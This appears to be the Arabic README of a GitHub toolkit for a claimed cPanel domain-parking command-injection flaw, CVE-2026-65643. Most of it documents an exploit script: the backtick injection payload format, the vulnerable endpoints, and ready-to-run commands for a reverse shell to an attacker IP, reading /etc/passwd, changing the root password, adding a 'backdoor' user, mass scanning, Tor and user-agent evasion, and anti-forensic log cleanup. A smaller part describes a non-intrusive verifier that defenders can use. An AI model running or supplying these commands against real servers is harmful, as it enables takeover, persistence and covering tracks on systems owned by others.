
مجموعة أدوات للفريق الأحمر/الأزرق لثغرة CVE-2026-65643، وهي ثغرة تنفيذ أوامر عن بُعد (RCE) في إيقاف النطاقات في cPanel. تتضمن استغلالًا مع قشرة عكسية، وقشرة ويب، واستمرارية، وفحصًا جماعيًا، بالإضافة إلى أداة تحقق غير تدخلية للكشف والتدقيق.

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرح به يوفر هذا المستودع أدوات لـمحترفي الأمن المصرح لهم، وفرق الدفاع الأزرق، ومختبري الاختراق فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (الولايات المتحدة)، وقانون إساءة استخدام الكمبيوتر (المملكة المتحدة)، والمواد 243/244 من قانون العقوبات التركي، وقوانين مماثلة في جميع أنحاء العالم.
CVE‑2026‑65643 هي ثغرة حرجة في حقن الأوامر في إصدارات cPanel & WHM 11.x تسمح لمستخدم cPanel مصادق عليه بتنفيذ أوامر نظام تعسفية بصلاحيات الجذر (root) عبر وظيفة إيقاف النطاقات (domain parking).
`).| الأداة | الغرض | المستخدم المقصود |
|---|---|---|
exploit.py | عدة استغلال كاملة مع shell عكسي، webshell، استمرارية، قراءة/كتابة ملفات، تغيير كلمة مرور الجذر، فحص جماعي، دعم Tor، وميزات OPSEC. | فرق الاختراق / مختبري الاختراق المصرح لهم |
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt
requests
urllib3
exploit.pyverifier.pyيستخدم الاستغلال نقاط نهاية وطرق حقن cPanel التالية:
# تنسيق حمولة الحقن
test.com`<command>`
# مثال
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`
يتم توفير هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.
verifier.py| فاحص ثغرات غير تدخلي يكتشف إصدار cPanel، ويتحقق من الحقن، ويقيّم المخاطر دون تنفيذ أي حمولة ضارة. يولّد تقارير مفصلة. |
| فرق الدفاع الأزرق / مدققو الأمن |
| الميزة | exploit.py | verifier.py |
|---|
| اكتشاف الثغرة | ✅ | ✅ |
| اكتشاف الإصدار (4 نقاط نهاية) | ✅ | ✅ |
| حقن الأوامر | ✅ | ❌ |
| Shell عكسي | ✅ | ❌ |
| رفع WebShell | ✅ | ❌ |
| استمرارية (إنشاء مستخدم cPanel) | ✅ | ❌ |
| تغيير كلمة مرور الجذر | ✅ | ❌ |
| قراءة/كتابة ملفات | ✅ | ❌ |
| 4 طرق حقن (JSON/Form/CGI/API2) | ✅ | ✅ |
| دعم Tor (إخفاء الهوية) | ✅ | ❌ |
| تدوير User‑Agent (OPSEC) | ✅ | ❌ |
| Jitter (OPSEC) | ✅ | ❌ |
| فحص جماعي (متعدد الخيوط) | ✅ | ❌ |
| Shell تفاعلي | ✅ | ❌ |
| وضع غير تدخلي (آمن) | ❌ | ✅ |
| تسجيل زمني | ✅ | ✅ |
| تقرير HTML | ✅ | ❌ |
| تقرير JSON | ✅ | ✅ |
| تنظيف السجلات (مضاد للطب الشرعي) | ✅ | ✅ |
| دعم الوكيل | ✅ | ✅ |
| User‑Agent مخصص | ✅ | ✅ |
| التحكم في التحقق من SSL | ✅ | ✅ |
| السيناريو | الأداة الموصى بها |
|---|
| فريق الدفاع الأزرق – التحقق مما إذا كان تثبيت cPanel لديك قابلاً للاختراق | verifier.py |
| تدقيق أمني – تقييم ثغرات غير تدخلي | verifier.py |
| فريق الاختراق – اختبار اختراق مصرح به مع استغلال كامل | exploit.py |
| مكافآت الثغرات – اختبار كشف مسؤول | verifier.py |
| فحص جماعي – فحص أهداف متعددة بحثاً عن الثغرة | exploit.py (اكتشاف فقط) |
| الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقة | verifier.py |
| المعامل | الوصف |
|---|
-t, --target | عنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083) |
-l, --target-file | ملف يحتوي على قائمة الأهداف (سطر واحد لكل هدف) للفحص الجماعي |
-u, --username | اسم مستخدم cPanel |
-P, --password | كلمة مرور cPanel |
-p, --port | تجاوز منفذ cPanel (الافتراضي من عنوان URL أو 2083) |
--threads | عدد الخيوط للأهداف المتعددة (الافتراضي: 10) |
-o, --output | حفظ تقرير JSON في ملف |
--html-report | حفظ تقرير HTML في ملف |
-v, --verbose | إخراج تفصيلي |
--proxy | وكيل HTTP/HTTPS (مثال: http://127.0.0.1:8080) |
--tor | التوجيه عبر Tor (localhost:9050) |
-ua, --user-agent | User‑Agent مخصص |
--no-keep-alive | عدم إبقاء الجلسة نشطة |
--delay | التأخير بين الطلبات (الافتراضي: 2.0 ثانية) |
--jitter | Jitter عشوائي (0‑1 ثانية) بين الطلبات (الافتراضي: 0.5) |
--max-retries | الحد الأقصى لإعادة المحاولة (الافتراضي: 5) |
--ssl-verify | التحقق من شهادات SSL |
--timeout | مهلة الطلب (الافتراضي: 15 ثانية) |
--cmd | تنفيذ أمر واحد على الهدف |
--reverse-shell | IP:PORT للـ shell العكسي |
--passwd | تغيير كلمة مرور الجذر |
--adduser | إنشاء مستخدم cPanel (USER DOMAIN PASSWORD) |
--read | قراءة ملف |
--write | كتابة ملف (تحديد المسار) |
--write-content | المحتوى المراد كتابته |
--cleanup | تنظيف السجلات والسجل بعد الاستغلال |
-i, --interactive | Shell تفاعلي بعد الاستغلال |
--domain-suffix | لاحقة النطاق الموقوف (الافتراضي: exploit.local) |
| المعامل | الوصف |
|---|
-t, --target | عنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083) |
-u, --username | اسم مستخدم cPanel |
-P, --password | كلمة مرور cPanel |
-o, --output | حفظ تقرير JSON في ملف |
-v, --verbose | إخراج تفصيلي |
--proxy | وكيل HTTP/HTTPS (مثال: http://127.0.0.1:8080) |
--tor | التوجيه عبر Tor (localhost:9050) |
--ssl-verify | التحقق من شهادات SSL |
--timeout | مهلة الطلب (الافتراضي: 15 ثانية) |
--cleanup | تنظيف السجلات بعد الاختبار |
| # | السيناريو | الأمر |
|---|
| 1 | فحص سريع للثغرة | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass |
| 2 | فحص تفصيلي مع تقرير | python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v |
| 3 | Shell عكسي | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | تنفيذ أمر | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami" |
| 5 | قراءة ملف حساس | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | تغيير كلمة مرور الجذر | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | إنشاء مستخدم cPanel جديد (استمرارية) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | Shell تفاعلي بعد الاستغلال | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | فحص جماعي من ملف | python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json |
| 10 | استخدام وكيل وTor وUser‑Agent مخصص | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0" |
| 11 | تنظيف السجلات بعد الاستغلال | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup |
| الطريقة | نقطة النهاية | الوصف |
|---|
| JSON API | /cpsessXXXXX/json-api/domain | طريقة الحقن الأساسية عبر حمولة JSON |
| Form Data | /cpsessXXXXX/json-api/domain | حقن بديل عبر بيانات مشفرة بنموذج |
| CGI Script | /cgi-sys/domainpark.cgi | حقن عبر نقطة نهاية CGI القديمة |
| API2 | /cpsessXXXXX/json-api/cpanel | طريقة حقن API2 القديمة |